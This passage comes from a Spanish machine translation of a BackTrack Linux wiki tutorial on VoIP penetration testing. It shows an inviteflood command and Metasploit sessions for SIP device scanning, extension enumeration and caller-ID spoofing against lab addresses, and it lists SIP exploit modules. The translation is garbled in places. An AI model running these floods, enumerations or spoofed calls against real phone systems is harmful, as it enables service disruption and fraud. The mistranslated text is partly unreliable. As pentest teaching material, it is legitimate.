root @ bt :/ pentest / voip / inviteflood # . / inviteflood eth0 192.168.1.104 192.168.1.104 1 201-a "Backtrack"

Atacando VoIP Con Metasploit

El marco de Metasploit incluye varios auxiliares y mdulos dedicados a la explotacin de VoIP. Usted puede encontrarlos
la funcin de bsqueda con palabras clave como "sip" o "VoIP". Vamos a lanzar "msfconsole" y realizar una bsqueda de
mdulos disponibles:

root @ bt: ~ # msfconsole


msf> Bsqueda sorbo

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

38/41

19/02/13

Pentesting VOIP - BackTrack Linux

Metasploit VoIP Mdulos


Aqu est una lista completa de los mdulos disponibles para su referencia:
Tropas auxiliares

escner / sip / enumerador - Enumerator SIP Nombre de usuario (UDP) escner / sip / enumerator_tcp - Enumerator N
usuario SIP (TCP) escner / sip / options - Escner de punto final SIP (UDP) escner / sip / options_tcp - Escner de pu
SIP (TCP) voip / sip_invite_spoof - Spoof SIP INVITE
Exploits

windows / sip / aim_triton_cseq - AIM Triton 1.0.4 Buffer Overflow CSeq windows / sip / sipxezphone_cseq - SIPfoun
sipXezPhone 0.35A desbordamiento de campo CSeq windows / sip / sipxphone_cseq - SIPfoundry sipXphone 2.6.0.27
desbordamiento de bfer CSeq unix / webapp / trixbox_langchoice - Trixbox langChoice PHP Inclusin de archivos loc

Exploracin de dispositivos habilitados para SIP

Metasploit proporciona un sorbo escner auxiliar que viene en dos sabores TCP y UDP, podemos usarlo para detectar disp
con capacidad SIP utilizando el mtodo OPCIN: Vamos a ver un ejemplo de la versin UDP: escner / sip / opciones au
Opciones auxiliares y uso:

msf> uso de auxiliares / escner / sip / options


msf auxiliar (opciones)> Mostrar Opciones
Opciones del mdulo auxiliar (/ escner / sip / opciones):
Nombre Valor Descripcin Requerido actual
-------------------------------------BATCHSIZE 256 yes El nmero de los ejrcitos de sondear en cada juego
CHOST no La direccin local del cliente
Cport 5060 no El puerto local del cliente
Rhosts s la meta rango de direcciones CIDR o identificador
Rport 5060 yes El puerto de destino
Temas del 1 S El nmero de subprocesos simultneos
A nadie no el nombre de usuario de destino para sondear en cada host
msf auxiliar (opciones)> rhosts conjunto 192.168.1.130/24
Rhosts => 192.168.1.130/24
msf auxiliar (opciones)> run

[*] 192.168.1.20 agente 200 = 'Grandstream HT-502 V1.2A 1.0.1.35 "verbos =' INVITE, ACK, OPTIONS, CANCEL, BYE, suscribir, NOTIFICAR, INFO, CONSULTE, UPDATE"
[*] 192.168.1.21 200 agente = 'Grandstream HT-502 V1.2A 1.0.1.35 "verbos =' INVITE, ACK, OPTIONS, cancelar, BYE, suscribir, NOTIFICAR, INFO, VER, ACTUALIZAR '
[*] 192.168.1.22 agente 200 = 'Grandstream HT -502 V1.2A 1.0.1.35 "verbos = 'INVITE, ACK, OPTIONS, CANCEL, BYE, suscribir, NOTIFICAR, INFO, CONSULTE, UPDATE"
[*] 192.168.1.92 agente 200 = 'Grandstream HT-502 V1.2A 1,0 .1.35 'verbos =' INVITE, ACK, OPTIONS, CANCEL, BYE, suscribir, NOTIFICAR, INFO, CONSULTE, UPDATE "
[*] 192.168.1.140 agente 200 = 'Grandstream HT-502 V1.2A 1.0.1.35 "verbos =' INVITE, ACK, OPTIONS, CANCEL, BYE, suscribir, NOTIFICAR, INFO, se refieren, actualizacin
[*] 200 192.168.1.130 server = 'PBX Asterisk 1.6.2.13 verbos' = 'INVITE, ACK, CANCEL, OPTIONS, BYE, CONSULTE , suscribir, NOTIFICAR, INFO '
[*] Scanned 256 de 256 hosts (100% complete)
[*] ejecucin del mdulo auxiliar completado

Enumerar extensiones de nombres de usuario SIP /


El escner / sip / enumerador auxiliar se puede utilizar para descubrir cuentas vlidas SIP, que soporta dos mtodos de
descubrimiento: OPCIONES DE REGISTRO y, tambin viene en dos sabores TCP y UDP. Opciones auxiliares:

msf> uso de escner / sip / enumerador


msf auxiliar (encuestador)> opciones de presentacin
Opciones del mdulo auxiliar (/ escner / sip / enumerador):
Nombre Valor Descripcin Requerido actual
--------------------------------------

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

39/41

19/02/13

Pentesting VOIP - BackTrack Linux

BATCHSIZE 256 yes El nmero de los ejrcitos de sondear en cada juego


CHOST no La direccin local del cliente
Cport 5060 no El puerto local del cliente
MAXEXT 9999 s Ending extensin
MTODO DE REGISTRO s Mtodo de recuento de usar OPCIONES / REGISTER
MINEXT 0 s Comenzando extensin
PADLEN 4 s relleno Cero mxima longitud
Rhosts s la meta rango de direcciones CIDR o identificador
Rport 5060 yes El puerto de destino
Temas del 1 S El nmero de subprocesos simultneos

Ejemplo de uso:
msf auxiliar (encuestador)> rhosts conjunto 192.168.1.104
Rhosts => 192.168.1.104
msf auxiliar (encuestador)> set MINEXT 100
MINEXT => 100
msf auxiliar (encuestador)> set MAXEXT 500
MAXEXT => 500
msf auxiliar (encuestador)> set PADLEN 3
PADLEN => 3
msf auxiliar (encuestador)> run
[*] usuario Encontrado: 200 <sip:[email protected]> [Auth]
[*] Encontrado usuario: 201 <sip:[email protected]> [Auth]
[*] Encontrado usuario : 202 <sip:[email protected]> [Auth]
[*] Encontrado usuario: 203 <sip:[email protected]> [Auth]
[*] Encontrado usuario: 204 <sip:[email protected]> [ Auth]
[*] usuario encontrado: 300 <sip:[email protected]> [Auth]
[*] Scanned 1 of 1 hosts (100% complete)
[*] ejecucin del mdulo auxiliar completado

Spoofing Caller ID auxiliar

El voip / sip_invite_spoof auxiliar crear una falsa peticin SIP invite hacer que suene el dispositivo especfico y mostrar
informacin falsa identificacin de llamadas. Opciones auxiliares:

msf> uso voip / sip_invite_spoof


msf auxiliares (sip_invite_spoof)> Mostrar Opciones
Opciones del mdulo auxiliar (/ voip / sip_invite_spoof):
Nombre Valor Descripcin Requerido actual
-------------------------------------El MSG Metasploit usted tiene s el identificador de llamadas falso para enviar
Rhosts s la meta rango de direcciones CIDR o identificador
Rport 5060 yes El puerto de destino
SRCADDR 192.168.1.1 si la direccin SIP a la llamada falsa proviene de
Temas del 1 S El nmero de subprocesos simultneos

Ejemplo de uso:
msf auxiliar (sip_invite_spoof)> rhosts conjunto 192.168.1.104
Rhosts => 192.168.1.104
msf auxiliar (sip_invite_spoof)> run
[*] El envo SIP Fake Invitar a: 192.168.1.104
[*] Scanned 1 de 1 hosts (100% complete)
[*] ejecucin del mdulo auxiliar completado

La explotacin de los sistemas de VoIP

Metasploit incluye varios exploits para el software cliente SIP e incluso para la interfaz de administracin web Trixbox PB

Aunque esta no es una vulnerabilidad especfica SIP est todava relacionada y puede permitir un control completo por un
en una PBX.

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

40/41

19/02/13

Pentesting VOIP - BackTrack Linux

Palabras de Cierre

Espero que hayas encontrado este documento informativo, por favor, tenga en cuenta que Backtrack Linux ofrece mucha
herramientas y caractersticas que no hemos tratado aqu. Tmese el tiempo para revisar las herramientas de leer los manu
documentos README que estoy seguro de que encontrar la herramienta adecuada para el trabajo.

Sintete libre de hablar de las herramientas y mtodos mencionados aqu en los Foros BackTrack Linux nos encantara aq
y experiencias de retroalimentacin.
http://www.backtrack-linux.org/forums/

Sobre el autor

Shai barra (alias @ NightRang3r) es un Tester Pen tiempo completo en Seguridad de la Informacin y Gestin de Riesgos
Israel, l lleva a cabo la ofensiva OSCP seguridad y certificaciones de la OSCE (entre otros) y gestiona su blog en
http://exploit.co.il

Referencias
http://en.wikipedia.org/wiki/Session_Initiation_Protocol
http://tools.ietf.org/html/rfc3261
http://www.hackingvoip.com/
Obtenido de " http://www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP "
Visita Revista Trendy
revistatrendy.com.mx/
El portal donde est todo lo entretenido de San Juan del Rio

Esta pgina fue modificada por ltima vez el 12 de junio de 2011, a las 19:16.

www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP

41/41

También podría gustarte